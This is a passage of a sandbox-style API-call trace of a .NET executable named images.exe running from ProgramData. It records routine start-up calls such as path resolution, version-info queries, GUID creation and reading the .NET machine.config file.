lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0154.878] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe", nBufferLength=0x105, lpBuffer=0x33e704, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe", lpFilePart=0x0) returned 0x19 [0154.878] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe", nBufferLength=0x105, lpBuffer=0x33e67c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe", lpFilePart=0x0) returned 0x19 [0154.880] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe", nBufferLength=0x105, lpBuffer=0x33e6d4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe", lpFilePart=0x0) returned 0x19 [0154.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x33eb34) returned 1 [0154.882] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe"), fInfoLevelId=0x0, lpFileInformation=0x33ebb0 | out: lpFileInformation=0x33ebb0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74793450, ftCreationTime.dwHighDateTime=0x1d6a092, ftLastAccessTime.dwLowDateTime=0x74793450, ftLastAccessTime.dwHighDateTime=0x1d6a092, ftLastWriteTime.dwLowDateTime=0x127e2500, ftLastWriteTime.dwHighDateTime=0x1d6a090, nFileSizeHigh=0x0, nFileSizeLow=0xb7400)) returned 1 [0154.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x33eb30) returned 1 [0154.886] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\ProgramData\\images.exe", lpdwHandle=0x33ec24 | out: lpdwHandle=0x33ec24) returned 0x6ac [0154.887] GetFileVersionInfoW (in: lptstrFilename="C:\\ProgramData\\images.exe", dwHandle=0x0, dwLen=0x6ac, lpData=0x2848bc4 | out: lpData=0x2848bc4) returned 1 [0154.888] VerQueryValueW (in: pBlock=0x2848bc4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x33ebf8, puLen=0x33ebf4 | out: lplpBuffer=0x33ebf8*=0x2848c60, puLen=0x33ebf4) returned 1 [0154.890] VerQueryValueW (in: pBlock=0x2848bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x33eb78, puLen=0x33eb74 | out: lplpBuffer=0x33eb78*=0x2848d00, puLen=0x33eb74) returned 1 [0154.891] VerQueryValueW (in: pBlock=0x2848bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x33eb78, puLen=0x33eb74 | out: lplpBuffer=0x33eb78*=0x2848d30, puLen=0x33eb74) returned 1 [0154.891] VerQueryValueW (in: pBlock=0x2848bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x33eb78, puLen=0x33eb74 | out: lplpBuffer=0x33eb78*=0x2848d64, puLen=0x33eb74) returned 1 [0154.891] VerQueryValueW (in: pBlock=0x2848bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x33eb78, puLen=0x33eb74 | out: lplpBuffer=0x33eb78*=0x2848d98, puLen=0x33eb74) returned 1 [0154.891] VerQueryValueW (in: pBlock=0x2848bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x33eb78, puLen=0x33eb74 | out: lplpBuffer=0x33eb78*=0x2848dcc, puLen=0x33eb74) returned 1 [0154.891] VerQueryValueW (in: pBlock=0x2848bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x33eb78, puLen=0x33eb74 | out: lplpBuffer=0x33eb78*=0x2848e60, puLen=0x33eb74) returned 1 [0154.891] VerQueryValueW (in: pBlock=0x2848bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x33eb78, puLen=0x33eb74 | out: lplpBuffer=0x33eb78*=0x2848e90, puLen=0x33eb74) returned 1 [0154.891] VerQueryValueW (in: pBlock=0x2848bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x33eb78, puLen=0x33eb74 | out: lplpBuffer=0x33eb78*=0x2848ec8, puLen=0x33eb74) returned 1 [0154.891] VerQueryValueW (in: pBlock=0x2848bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x33eb78, puLen=0x33eb74 | out: lplpBuffer=0x33eb78*=0x2848cb8, puLen=0x33eb74) returned 1 [0154.891] VerQueryValueW (in: pBlock=0x2848bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x33eb78, puLen=0x33eb74 | out: lplpBuffer=0x33eb78*=0x2848e28, puLen=0x33eb74) returned 1 [0154.891] VerQueryValueW (in: pBlock=0x2848bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x33eb78, puLen=0x33eb74 | out: lplpBuffer=0x33eb78*=0x0, puLen=0x33eb74) returned 0 [0154.891] VerQueryValueW (in: pBlock=0x2848bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x33eb78, puLen=0x33eb74 | out: lplpBuffer=0x33eb78*=0x0, puLen=0x33eb74) returned 0 [0154.891] VerQueryValueW (in: pBlock=0x2848bc4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x33eb6c, puLen=0x33eb68 | out: lplpBuffer=0x33eb6c*=0x2848c60, puLen=0x33eb68) returned 1 [0154.891] VerLanguageNameW (in: wLang=0x0, szLang=0x33e8fc, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0154.900] VerQueryValueW (in: pBlock=0x2848bc4, lpSubBlock="\\", lplpBuffer=0x33eb7c, puLen=0x33eb78 | out: lplpBuffer=0x33eb7c*=0x2848bec, puLen=0x33eb78) returned 1 [0155.047] CoTaskMemAlloc (cb=0x20c) returned 0x7ad028 [0155.047] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x7ad028 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0155.049] CoTaskMemFree (pv=0x7ad028) [0155.049] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x33e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpFilePart=0x0) returned 0x2d [0155.049] CoTaskMemAlloc (cb=0x20c) returned 0x7ad028 [0155.049] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x7ad028 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0155.051] CoTaskMemFree (pv=0x7ad028) [0155.051] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x33e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0155.058] CoCreateGuid (in: pguid=0x33e454 | out: pguid=0x33e454*(Data1=0x763e0a5d, Data2=0xaad7, Data3=0x44e4, Data4=([0]=0xb7, [1]=0xb9, [2]=0xb3, [3]=0xf0, [4]=0x45, [5]=0x46, [6]=0x2a, [7]=0x6d))) returned 0x0 [0155.058] CoCreateGuid (in: pguid=0x33e454 | out: pguid=0x33e454*(Data1=0x3af4613a, Data2=0x4be8, Data3=0x4a05, Data4=([0]=0xa7, [1]=0xed, [2]=0x16, [3]=0xd1, [4]=0xc5, [5]=0xde, [6]=0x64, [7]=0x4d))) returned 0x0 [0155.058] CoCreateGuid (in: pguid=0x33e454 | out: pguid=0x33e454*(Data1=0x2256afa5, Data2=0x86e4, Data3=0x4cd1, Data4=([0]=0x8a, [1]=0x64, [2]=0x36, [3]=0xd9, [4]=0xbf, [5]=0x47, [6]=0x57, [7]=0x3b))) returned 0x0 [0155.059] CoCreateGuid (in: pguid=0x33e454 | out: pguid=0x33e454*(Data1=0x95e3b83d, Data2=0x6a8e, Data3=0x48b0, Data4=([0]=0x83, [1]=0x41, [2]=0x3e, [3]=0xc1, [4]=0xbd, [5]=0x77, [6]=0xdf, [7]=0xed))) returned 0x0 [0155.059] CoCreateGuid (in: pguid=0x33e454 | out: pguid=0x33e454*(Data1=0xcfd18a82, Data2=0x59ac, Data3=0x4965, Data4=([0]=0x89, [1]=0x29, [2]=0x12, [3]=0x9d, [4]=0x8d, [5]=0xc5, [6]=0xeb, [7]=0xcd))) returned 0x0 [0155.059] CoCreateGuid (in: pguid=0x33e454 | out: pguid=0x33e454*(Data1=0xd9159d71, Data2=0x49f, Data3=0x4494, Data4=([0]=0x8b, [1]=0xc9, [2]=0x1f, [3]=0x26, [4]=0xe4, [5]=0x54, [6]=0xdf, [7]=0x1b))) returned 0x0 [0155.059] CoCreateGuid (in: pguid=0x33e454 | out: pguid=0x33e454*(Data1=0x7a3ed4da, Data2=0x27c2, Data3=0x452e, Data4=([0]=0xb6, [1]=0x2, [2]=0x72, [3]=0x50, [4]=0x2b, [5]=0xb4, [6]=0xef, [7]=0x21))) returned 0x0 [0155.059] CoCreateGuid (in: pguid=0x33e454 | out: pguid=0x33e454*(Data1=0x928f1bd3, Data2=0x842f, Data3=0x4907, Data4=([0]=0x9c, [1]=0x8e, [2]=0x58, [3]=0x14, [4]=0x48, [5]=0x96, [6]=0xf0, [7]=0x62))) returned 0x0 [0155.059] CoCreateGuid (in: pguid=0x33e454 | out: pguid=0x33e454*(Data1=0x7631b673, Data2=0x7e3f, Data3=0x4da2, Data4=([0]=0xb6, [1]=0x6a, [2]=0xd0, [3]=0x57, [4]=0x36, [5]=0x1f, [6]=0x68, [7]=0xe))) returned 0x0 [0155.059] CoCreateGuid (in: pguid=0x33e454 | out: pguid=0x33e454*(Data1=0x7f56f658, Data2=0x54d6, Data3=0x4c96, Data4=([0]=0xa5, [1]=0x97, [2]=0x7d, [3]=0x13, [4]=0x55, [5]=0xe9, [6]=0x9d, [7]=0x3e))) returned 0x0 [0155.059] CoCreateGuid (in: pguid=0x33e454 | out: pguid=0x33e454*(Data1=0x3c9fc2e2, Data2=0x2e5c, Data3=0x4910, Data4=([0]=0xba, [1]=0x10, [2]=0x30, [3]=0xf4, [4]=0xbb, [5]=0x65, [6]=0x2e, [7]=0xf0))) returned 0x0 [0155.059] CoCreateGuid (in: pguid=0x33e454 | out: pguid=0x33e454*(Data1=0x708d2316, Data2=0x30e1, Data3=0x4320, Data4=([0]=0xab, [1]=0x9b, [2]=0xfe, [3]=0xc5, [4]=0x63, [5]=0xfe, [6]=0x27, [7]=0x5b))) returned 0x0 [0155.065] CoCreateGuid (in: pguid=0x33e578 | out: pguid=0x33e578*(Data1=0x54185d90, Data2=0xbf91, Data3=0x4d94, Data4=([0]=0xaa, [1]=0xb, [2]=0x58, [3]=0x9e, [4]=0x51, [5]=0xa6, [6]=0xc4, [7]=0x2))) returned 0x0 [0155.065] CoCreateGuid (in: pguid=0x33e578 | out: pguid=0x33e578*(Data1=0x2648b17f, Data2=0x46c1, Data3=0x4f3a, Data4=([0]=0x8d, [1]=0x83, [2]=0xb2, [3]=0xe9, [4]=0x83, [5]=0x2b, [6]=0xa8, [7]=0x38))) returned 0x0 [0155.065] CoCreateGuid (in: pguid=0x33e578 | out: pguid=0x33e578*(Data1=0x1de859b9, Data2=0x4217, Data3=0x4ce3, Data4=([0]=0x98, [1]=0x7e, [2]=0x6, [3]=0x9c, [4]=0xf7, [5]=0x92, [6]=0x8, [7]=0x2d))) returned 0x0 [0155.294] GetCurrentProcess () returned 0xffffffff [0155.295] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33e9cc | out: TokenHandle=0x33e9cc*=0x270) returned 1 [0155.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x33e4ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0155.443] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x33e9cc | out: lpFileInformation=0x33e9cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0155.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x33e478, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0155.444] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x33e9cc | out: lpFileInformation=0x33e9cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0155.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x33e404, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0155.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x33e8f8) returned 1 [0155.445] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x274 [0155.446] GetFileType (hFile=0x274) returned 0x1 [0155.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x33e8f4) returned 1 [0155.446] GetFileType (hFile=0x274) returned 0x1 [0155.463] GetFileSize (in: hFile=0x274, lpFileSizeHigh=0x33e9c0 | out: lpFileSizeHigh=0x33e9c0*=0x0) returned 0x8c8f [0155.463] ReadFile (in: hFile=0x274, lpBuffer=0x285e288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e97c, lpOverlapped=0x0 | out: lpBuffer=0x285e288*, lpNumberOfBytesRead=0x33e97c*=0x1000, lpOverlapped=0x0) returned 1 [0155.483] ReadFile (in: hFile=0x274, lpBuffer=0x285e288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e818, lpOverlapped=0x0 | out: lpBuffer=0x285e288*, lpNumberOfBytesRead=0x33e818*=0x1000, lpOverlapped=0x0) returned 1 [0155.491] ReadFile (in: hFile=0x274, lpBuffer=0x285e288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e6cc, lpOverlapped=0x0 | out: lpBuffer=0x285e288*, lpNumberOfBytesRead=0x33e6cc*=0x1000, lpOverlapped=0x0) returned 1 [0155.492] ReadFile (in: hFile=0x274, lpBuffer=0x285e288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e6cc, lpOverlapped=0x0 | out: lpBuffer=0x285e288*, lpNumberOfBytesRead=0x33e6cc*=0x1000, lpOverlapped=0x0) returned 1 [0155.492] ReadFile (in: hFile=0x274, lpBuffer=0x285e288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e6cc, lpOverlapped=0x0 | out: lpBuffer=0x285e288*, lpNumberOfBytesRead=0x33e6cc*=0x1000, lpOverlapped=0x0) returned 1 [0155.492] ReadFile (in: hFile=0x274, lpBuffer=0x285e288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e604, lpOverlapped=0x0 | out: lpBuffer=0x285e288*, lpNumberOfBytesRead=0x33e604*=0x1000, lpOverlapped=0x0) returned 1 [0155.498] ReadFile (in: hFile=0x274, lpBuffer=0x285e288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e780, lpOverlapped=0x0 | out: lpBuffer=0x285e288*, lpNumberOfBytesRead=0x33e780*=0x1000, lpOverlapped=0x0) returned 1 [0155.500] ReadFile (in: hFile=0x274, lpBuffer=0x285e288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e694, lpOverlapped=0x0 | out: lpBuffer=0x285e288*, lpNumberOfBytesRead=0x33e694*=0x1000, lpOverlapped=0x0) returned 1 [0155.501] ReadFile (in: hFile=0x274, lpBuffer=0x285e288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e694, lpOverlapped=0x0 | out: lpBuffer=0x285e288*, lpNumberOfBytesRead=0x33e694*=0xc8f, lpOverlapped=0x0) returned 1 [0155.501] ReadFile (in: hFile=0x274, lpBuffer=0x285e288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e754, lpOverlapped=0x0 | out: lpBuffer=0x285e288*, lpNumberOfBytesRead=0x33e754*=0x0, lpOverlapped=0x0) returned 1 [0155.501] CloseHandle (hObject=0x274) returned 1 [0155.502] GetCurrentProcess () returned 0xffffffff [0155.502] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33eb00 | out: TokenHandle=0x33eb00*=0x274) returned 1 [0155.503] GetCurrentProcess () returned 0xffffffff [0155.503] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33eb00 | out: TokenHandle=0x33eb00*=0x268) returned 1 [0155.504] GetCurrentProcess () returned 0xffffffff [0155.504] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33e9cc | out: TokenHandle=0x33e9cc*=0x278) returned 1 [0155.504] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\images.exe.config" (normalized: "c:\\programdata\\images.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x33e9cc | out: lpFileInformation=0x33e9cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.504] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x33e478, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0155.504] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\images.exe.config" (normalized: "c:\\programdata\\images.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x33e9cc | out: lpFileInformation=0x33e9cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.505] GetCurrentProcess () returned 0xffffffff [0155.505] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33eb00 | out: TokenHandle=0x33eb00*=0x27c) returned 1 [0155.505] GetCurrentProcess () returned 0xffffffff [0155.506] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33eb00 | out: TokenHandle=0x33eb00*=0x280) returned 1 [0155.508] GetCurrentProcess () returned 0xffffffff [0155.508] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33eb04 | out: TokenHandle=0x33eb04*=0x284) returned 1 [0155.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x33e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0155.509] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x33eb04 | out: lpFileInformation=0x33eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0155.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x33e53c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0155.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x33ea30) returned 1 [0155.509] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0155.509] GetFileType (hFile=0x288) returned 0x1 [0155.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x33ea2c) returned 1 [0155.509] GetFileType (hFile=0x288) returned 0x1 [0155.509] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x33eaf8 | out: lpFileSizeHigh=0x33eaf8*=0x0) returned 0x8c8f [0155.509] ReadFile (in: hFile=0x288, lpBuffer=0x2876c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33eab4, lpOverlapped=0x0 | out: lpBuffer=0x2876c70*, lpNumberOfBytesRead=0x33eab4*=0x1000, lpOverlapped=0x0) returned 1 [0155.510] ReadFile (in: hFile=0x288, lpBuffer=0x2876c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e950, lpOverlapped=0x0 | out: lpBuffer=0x2876c70*, lpNumberOfBytesRead=0x33e950*=0x1000, lpOverlapped=0x0) returned 1 [0155.510] ReadFile (in: hFile=0x288, lpBuffer=0x2876c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e804, lpOverlapped=0x0 | out: lpBuffer=0x2876c70*, lpNumberOfBytesRead=0x33e804*=0x1000, lpOverlapped=0x0) returned 1 [0155.510] ReadFile (in: hFile=0x288, lpBuffer=0x2876c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e804, lpOverlapped=0x0 | out: lpBuffer=0x2876c70*, lpNumberOfBytesRead=0x33e804*=0x1000, lpOverlapped=0x0) returned 1 [0155.510] ReadFile (in: hFile=0x288, lpBuffer=0x2876c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e804, lpOverlapped=0x0 | out: lpBuffer=0x2876c70*, lpNumberOfBytesRead=0x33e804*=0x1000, lpOverlapped=0x0) returned 1 [0155.511] ReadFile (in: hFile=0x288, lpBuffer=0x2876c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e73c, lpOverlapped=0x0 | out: lpBuffer=0x2876c70*, lpNumberOfBytesRead=0x33e73c*=0x1000, lpOverlapped=0x0) returned 1 [0155.511] CloseHandle (hObject=0x288) returned 1 [0155.511] GetCurrentProcess () returned 0xffffffff [0155.511] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33eac0 | out: TokenHandle=0x33eac0*=0x288) returned 1 [0155.511] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x33e56c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0155.512] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\images.exe.config" (normalized: "c:\\programdata\\images.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x33eac0 | out: lpFileInformation=0x33eac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.512] GetCurrentProcess () returned 0xffffffff [0155.512] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33ea7c | out: TokenHandle=0x33ea7c*=0x28c) returned 1 [0155.512] GetCurrentProcess () returned 0xffffffff [0155.512] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33ea38 | out: TokenHandle=0x33ea38*=0x290) returned 1 [0155.513] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x33e5ec, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0155.513] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x33e598, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0155.514] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe", nBufferLength=0x105, lpBuffer=0x33e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe", lpFilePart=0x0) returned 0x19 [0155.514] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe", nBufferLength=0x105, lpBuffer=0x33e56c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe", lpFilePart=0x0) returned 0x19 [0155.514] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe", nBufferLength=0x105, lpBuffer=0x33e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe", lpFilePart=0x0) returned 0x19 [0155.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x33ea24) returned 1 [0155.514] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe"), fInfoLevelId=0x0, lpFileInformation=0x33eaa0 | out: lpFileInformation=0x33eaa0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74793450, ftCreationTime.dwHighDateTime=0x1d6a092, ftLastAccessTime.dwLowDateTime=0x74793450, ftLastAccessTime.dwHighDateTime=0x1d6a092, ftLastWriteTime.dwLowDateTime=0x127e2500, ftLastWriteTime.dwHighDateTime=0x1d6a090, nFileSizeHigh=0x0, nFileSizeLow=0xb7400)) returned 1 [0155.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x33ea20) returned 1 [0155.515] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\ProgramData\\images.exe", lpdwHandle=0x33eb14 | out: lpdwHandle=0x33eb14) returned 0x6ac [0155.515] GetFileVersionInfoW (in: lptstrFilename="C:\\ProgramData\\images.exe", dwHandle=0x0, dwLen=0x6ac, lpData=0x2889458 | out: lpData=0x2889458) returned 1 [0155.515] VerQueryValueW (in: pBlock=0x2889458, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x33eae8, puLen=0x33eae4 | out: lplpBuffer=0x33eae8*=0x28894f4, puLen=0x33eae4) returned 1 [0155.515] VerQueryValueW (in: pBlock=0x2889458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x33ea68, puLen=0x33ea64 | out: lplpBuffer=0x33ea68*=0x2889594, puLen=0x33ea64) returned 1 [0155.515] VerQueryValueW (in: pBlock=0x2889458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x33ea68, 